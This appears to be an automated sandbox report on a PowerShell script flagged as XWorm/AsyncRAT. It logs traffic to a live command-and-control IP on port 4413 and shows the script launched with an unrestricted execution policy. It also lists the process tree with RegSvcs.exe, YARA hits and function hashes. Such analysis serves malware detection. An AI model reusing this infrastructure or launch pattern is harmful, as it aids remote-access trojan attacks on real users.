                                          Jan 11, 2025 10:04:55.320519924 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.057101011 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:01.062213898 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.181931973 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:01.187108994 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.272150993 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.274286985 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:01.279154062 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.395540953 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:01.397753954 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:01.402652979 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:07.510250092 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:07.515286922 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:07.723495960 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:07.725208998 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:07.730114937 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:15.747680902 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:15.904336929 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:20.981127977 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:20.986325979 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:21.197541952 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:21.199697018 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:21.204714060 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:24.494283915 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:24.500031948 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:24.708086014 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:24.710810900 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:24.715910912 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:27.838268042 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:27.843240976 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:28.051667929 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:28.064302921 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:28.069170952 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:33.103857040 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:33.108886957 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:33.464027882 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:33.465784073 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:33.470621109 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:33.931940079 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:33.937783003 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:34.149677038 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:34.154959917 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:34.160203934 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:45.767808914 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:45.947202921 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:47.400626898 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:47.405706882 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:47.613888979 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:47.615191936 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:47.620047092 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:55.059015036 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:55.064420938 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:55.274630070 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:05:55.322202921 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:55.404050112 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:05:55.410958052 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:06.166294098 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:06.171521902 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:06.379585028 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:06.384568930 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:06.389524937 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:15.784852028 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:15.853497028 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:19.634967089 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:19.640157938 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:19.851541996 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:19.852832079 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:19.857953072 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:33.133470058 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:33.138684034 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:33.347245932 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:33.411931038 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:33.416913986 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:43.588295937 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:43.593729019 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:43.801918983 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:43.803194046 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:43.808080912 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:45.797759056 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:45.850577116 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.169375896 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.174758911 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.340497017 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.345835924 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.383426905 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.385514975 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.435904980 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.494568110 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.499809980 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.554172993 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.555629015 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.560574055 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.846791029 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.848083019 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.853081942 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:47.963169098 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:47.968503952 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:48.222026110 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:48.227166891 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:48.232187986 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:51.278939009 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:51.284471035 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:51.492933035 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:51.541080952 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:51.610033035 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:51.615272045 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:52.103925943 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:52.109277964 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:52.317425966 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:52.319099903 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:52.324027061 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.275779009 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.281081915 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.307058096 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.312374115 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.489178896 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.490802050 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.495716095 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.609906912 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.611321926 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.616221905 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.150677919 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:55.156070948 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.380815029 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.382570028 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:55.387569904 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.371218920 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:00.376627922 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.584845066 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.587024927 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:00.591989994 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.791402102 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.796681881 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.916507959 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.921680927 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.932029963 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.936887980 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.963228941 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.968179941 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.978842020 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.983760118 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.006405115 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.007679939 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.059721947 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.133440018 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.134457111 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.146152973 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.250901937 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.255218029 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.260149956 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.371023893 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.375195980 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.380100012 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.383325100 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.388139963 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.605058908 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.610132933 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.831267118 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.833348036 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.838221073 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.377590895 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:10.382812023 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.590895891 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.591417074 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:10.596385956 CET441349718176.113.115.170192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 11, 2025 10:03:34.860136986 CET5363290162.159.36.2192.168.2.6
                                          Jan 11, 2025 10:03:35.338906050 CET6298853192.168.2.61.1.1.1
                                          Jan 11, 2025 10:03:35.347450972 CET53629881.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 11, 2025 10:03:35.338906050 CET192.168.2.61.1.1.10x8c6Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 11, 2025 10:03:35.347450972 CET1.1.1.1192.168.2.60x8c6Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:04:03:02
                                          Start date:11/01/2025
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:04:03:02
                                          Start date:11/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:04:03:05
                                          Start date:11/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x940000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFD3489D8EA Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Yr
                                            • API String ID: 0-48185740
                                            • Opcode ID: c943c198aa726a42a4a3b90638eb9269127ad376241fc7e7ab70d6747365b361
                                            • Instruction ID: 312f045e8fcc00afa37906d1a0f32286f941707f30017c1a7fdb221ef7917896
                                            • Opcode Fuzzy Hash: c943c198aa726a42a4a3b90638eb9269127ad376241fc7e7ab70d6747365b361
                                            • Instruction Fuzzy Hash: 2DF06532B4CF0687E6117B50C5E05B836C3ABC3318F654235C606CB2C2ED6DA9456649
                                            Function 00007FFD34961C29 Relevance: .4, Instructions: 396COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208679066.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3232fd964f16efbce570b88c99d3de68ceaed7f950332fb976f62478cd358d79
                                            • Instruction ID: 428725a9467008aebd68c9a42142680d1fa89c19edd739345e95784b525e9a24
                                            • Opcode Fuzzy Hash: 3232fd964f16efbce570b88c99d3de68ceaed7f950332fb976f62478cd358d79
                                            • Instruction Fuzzy Hash: BCB12A62B0EB890FE796962C58B61B87BD1EF57230B0802FFD18DC7197DE1DA8069351
                                            Function 00007FFD3489B2F2 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67f6bcd5c2c6510cfa0314d360285ab673bf19732a2cc7ebcbbf40c3fd843f74
                                            • Instruction ID: d03e2746cb47078c66e0fa9e2a757b3e48e8ae0215f32e6b193ff8aded9b5638
                                            • Opcode Fuzzy Hash: 67f6bcd5c2c6510cfa0314d360285ab673bf19732a2cc7ebcbbf40c3fd843f74
                                            • Instruction Fuzzy Hash: A1213863B0DA555FE758A66C9CA55F67BD1EF9327030802BFD18AC7193EC1868064290
                                            Function 00007FFD3496149A Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208679066.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3553df36754f14bb477414ee98f2a84a4911c1f0e66392c122058b00494c995e
                                            • Instruction ID: d827d8bc9613a534c8d6349cdcc4f5bbe0d30693f8a794b233f90bd3eff65e3e
                                            • Opcode Fuzzy Hash: 3553df36754f14bb477414ee98f2a84a4911c1f0e66392c122058b00494c995e
                                            • Instruction Fuzzy Hash: 90212E32B0C9190FFBA4966C64675F4B3D2EF95370B1801BBD54EC3196DD1DAC155390
                                            Function 00007FFD3489B3AA Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 158a0ad237624879c0a9461802c9d35656c2279f1c493880ba65786dc4695f93
                                            • Instruction ID: 2c8b41ae07bbd9eee204ddd4ab78cda8bc4471fc84d25bd1a734f4c6667ab0d3
                                            • Opcode Fuzzy Hash: 158a0ad237624879c0a9461802c9d35656c2279f1c493880ba65786dc4695f93
                                            • Instruction Fuzzy Hash: E2110B52B1CE4657E71CAB6C48B61797AC3EFD6310B14817ED94AC32D7EC2C7C412182
                                            Function 00007FFD3489B4D4 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86cc2baa37428806058d51dc4811794b8b49f4f262694f711e856aebacda485c
                                            • Instruction ID: 0b114cd92ed62c9d0b549ee5fd40e5ebcfc5a93938125d7a5fedfbc6f3a7e410
                                            • Opcode Fuzzy Hash: 86cc2baa37428806058d51dc4811794b8b49f4f262694f711e856aebacda485c
                                            • Instruction Fuzzy Hash: AA018453F1CE4A5BE698A77C18BA279AAC1FF66610B4802BED94DD32D3DC1C3C016281
                                            Function 00007FFD3489D97C Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81c5e316d8eca2a5aae864ab6033118087c79185e2b265fa7442c11eb26739bf
                                            • Instruction ID: fd5a694c372be8af6057a3593c225890e32f0274566b72c408b0abdd079cc959
                                            • Opcode Fuzzy Hash: 81c5e316d8eca2a5aae864ab6033118087c79185e2b265fa7442c11eb26739bf
                                            • Instruction Fuzzy Hash: 7001A252B0CD460BF39DB7A800B92B959C2DFA6749B0401BFC60EC72D3DC1CB8452389
                                            Function 00007FFD348937B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45
                                            Function 00007FFD349614C1 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208679066.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13afe774dfdad68bdc1a15cacbe22741df590d27210a85658c9d87c813a4e7a7
                                            • Instruction ID: e730f9fd3fe8cf1c57286e0291a880b1ea76b5e75f754e4cd397272465981f63
                                            • Opcode Fuzzy Hash: 13afe774dfdad68bdc1a15cacbe22741df590d27210a85658c9d87c813a4e7a7
                                            • Instruction Fuzzy Hash: CDF08223F0D9590EF7A195AC34A71F496C2EFA667174802BBD98EC325ADC1C6C155390
                                            Function 00007FFD348985CE Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                            • Instruction ID: 030d8506fbf5dd07100f65fa6565c412e0434956165931c4e9a3b2cfe8a83e1d
                                            • Opcode Fuzzy Hash: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                            • Instruction Fuzzy Hash: BDF0E9317486064BDB1CDE3C84A70397696E786300760523DE997C73E6FC28E92382C1
                                            Function 00007FFD348955AB Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd399b43da0b202a4eed6ef7b787f42e79f1d441521606ab0e3fb05ee8d8e9c9
                                            • Instruction ID: 7443001c9cfd3001d702ffc2696307a3d42f97e54776c436e7e2f8b6986cee00
                                            • Opcode Fuzzy Hash: dd399b43da0b202a4eed6ef7b787f42e79f1d441521606ab0e3fb05ee8d8e9c9
                                            • Instruction Fuzzy Hash: DFF01230A2D7455BD7889B6880A542A7BD1FF89604F50653DE5CAD3282CB38A9028A47
                                            Function 00007FFD348948D7 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
                                            • Instruction ID: cfdb3aaec4c7ae0025218d6ef1ec2c0fad0cebddd64555760520ef25db3ee97a
                                            • Opcode Fuzzy Hash: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
                                            • Instruction Fuzzy Hash: E3F06D70E0950BCBEB04DFA8C4819BEBBF2BB85710F108526D105E2285DA38AA40DF90

                                            Non-executed Functions

                                            Function 00007FFD348940FA Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
